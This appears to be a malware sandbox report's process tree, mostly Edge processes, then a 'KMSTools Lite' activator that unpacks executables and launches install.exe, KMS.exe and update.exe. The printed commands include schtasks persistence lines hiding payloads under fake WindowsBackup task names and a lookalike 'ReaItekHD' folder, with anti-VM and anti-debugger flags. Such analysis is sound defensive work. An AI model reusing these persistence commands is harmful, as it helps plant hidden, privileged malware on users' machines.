C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4800,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:82⤵PID:3688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5812 /prefetch:82⤵PID:1756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5812 /prefetch:82⤵PID:4668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5956,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5900 /prefetch:82⤵PID:3108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5224,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6204 /prefetch:12⤵PID:3968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5168,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:82⤵PID:5668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=4812,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:12⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5880,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6724 /prefetch:82⤵PID:5736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6736,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:82⤵PID:4888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6584,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6800 /prefetch:82⤵PID:5540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5964,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:82⤵PID:1344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6316,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:82⤵PID:4476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6052,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5948 /prefetch:82⤵PID:4384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6416,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6164 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4836,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:82⤵PID:828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3280,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:82⤵PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5004,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:82⤵PID:5480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3988 /prefetch:82⤵PID:3772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6816,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2892 /prefetch:82⤵PID:1008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5828,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:82⤵PID:2844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3568,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5468 /prefetch:82⤵PID:3524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3416,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5324 /prefetch:82⤵PID:2216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5468,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6160 /prefetch:82⤵PID:764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5560,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3288 /prefetch:82⤵PID:3352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6840,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:82⤵PID:5816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=3376,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:12⤵PID:2836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=5368,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:12⤵PID:1556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window2⤵
- Loads dropped DLL
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:468 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x28c,0x7ff847c7f208,0x7ff847c7f214,0x7ff847c7f2203⤵PID:3636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1852,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=2644 /prefetch:33⤵PID:5268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2608,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:23⤵PID:3396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2296,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=3224 /prefetch:83⤵PID:2284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4228,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:83⤵PID:1288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4376,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:13⤵PID:324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4696,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4756 /prefetch:83⤵PID:2744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4776 /prefetch:83⤵PID:2396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=4728,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:13⤵PID:3800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:83⤵PID:3192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:83⤵PID:2544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5704,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5800 /prefetch:83⤵PID:2908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5748,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:83⤵PID:2504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5776,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:83⤵PID:2808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4972,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:83⤵PID:216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4816,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:83⤵PID:3784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=604,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4768 /prefetch:83⤵PID:4624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5792,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:83⤵PID:2576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4052,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:83⤵PID:2516
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:5540
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:4476
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:5828
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5444
-
C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe"C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2560
-
C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe"C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2936
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\PerfLogs\KMSTools.zip"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2120 -
C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe"C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:344
-
-
C:\KMS Tools Lite Portable\KMSTools Lite.exe"C:\KMS Tools Lite Portable\KMSTools Lite.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4264 -
C:\KMS Tools Lite Portable\GSetup.exe"C:\KMS Tools Lite Portable\GSetup.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4712 -
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSTools "C:\Users\Admin\AppData\Local\Temp\KMSTools.tmp" /Y3⤵PID:2288
-
-
C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe"C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\KMS Tools Lite Portable\Programs" "W10 Digital Activation Program"*3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5576
-
-
C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe"C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1300
-
-
C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe"C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\KMS Tools Lite Portable\Programs" "Office Installer+"*3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1544
-
-
C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe"C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2748
-
-
-
C:\ProgramData\Setup\install.exeC:\ProgramData\Setup\install.exe -palexpassword2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5232 -
C:\ProgramData\Setup\KMS.exe"C:\ProgramData\Setup\KMS.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocks application from running via registry modification
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1748
-
-
C:\ProgramData\Setup\update.exe"C:\ProgramData\Setup\update.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5544 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\SystemManager" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2568
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\ManagerService" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:4100
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\GlobalData" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2244
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:5380
-
-
